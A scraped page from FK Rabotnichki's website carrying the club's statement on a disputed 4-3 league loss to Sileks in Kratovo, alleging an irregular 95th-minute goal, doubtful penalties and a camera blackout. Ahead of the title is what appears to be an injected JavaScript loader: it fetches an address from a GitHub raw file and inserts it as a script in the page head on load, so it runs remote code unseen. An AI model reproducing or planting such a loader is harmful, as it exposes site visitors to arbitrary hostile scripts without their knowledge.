;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » СКАНДАЛ ВО КРАТОВО: Нерегуларен седми гол, исклучени камери и криминално судење на мечот со Силекс
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

СКАНДАЛ ВО КРАТОВО: Нерегуларен седми гол, исклучени камери и криминално судење на мечот со Силекс

Почитувани,
Фудбалскиот клуб Работнички како долгогодишен член на Првата фудбалска лига на Република Македонија и поранешен повеќекратен шампион на државата чувствува потреба да ги изнесе видувањата за сканадалозните случувања на првенствениот натпревар кој нашиот тим го одигра денеска во Кратово против Силекс.

Би сакале да ве информираме за следниве работи:

ФК Работнички е драстично оштетен на натпреварот против Силекс во Кратово (4-3). Клубот реагира на нерегуларно постигнатиот победнички гол на домашниот тим. При акцијата на голот што го постигна Бурхан Мустафов, топката претходно е излезена во гол – аут, од каде еден фудбалер на Силекс со глава ја враќа во игра и потоа Мустафов постигнува нерегуларен погодок.

Скандалот е уште поголем ако се знае дека последните две минути од мечот, нема интернет пренос во живо на веб сајтот на ФФМ, затоа што одеднаш снемало електрична енергија во сегментот каде се поставени телевизиските камери.

ФК Работнички прашува дали ова е свесна режија во која клубот повторно треба да биде драстично оштетен и да го загуби натпреварот?
Како клуб кој вложува големи финансиски средства во натпреварувањето во Првата лига, сакаме да го истакнеме катастрофалното судење на главниот судија Васко Мавров и неговите асистенти.

Четвртиот гол на Силекс, постигнат во 95.минута, е апсолутно нерегуларен затоа што топката е излезена во гол-аут и потоа вратена во поле, а Бурхан Мустафов постигнува гол.
При вториот гол на ФК Силекс во 50.минута, напаѓачот Урош Ѓуриќ игра со рака во петерецот на Работнички, судијата Васко Мавров не реагира, а домашниот тим постигнува гол преку Денис Ристов.

Првиот досуден пенал за ФК Силекс во 28.минута е крајно сомнителен, со оглед дека ниеден фудбалер на ФК Работнички нема старт кон противничкиот фудбалер. Судијата Васко Мавров покажува на белата точка.

На вториот досуден пенал за ФК Силекс, во 78.минута, претходи класичен прекршок над фудбалер на ФК Работнички кој судијата Васко Мавров не го санкционира. Во продолжението на акцијата тој досуди пенал за домашниот тим.

ФК Работнички инсистира овој скандал итно да биде расчистен од Натпреварувачката и од Судиската комисија на ФФМ.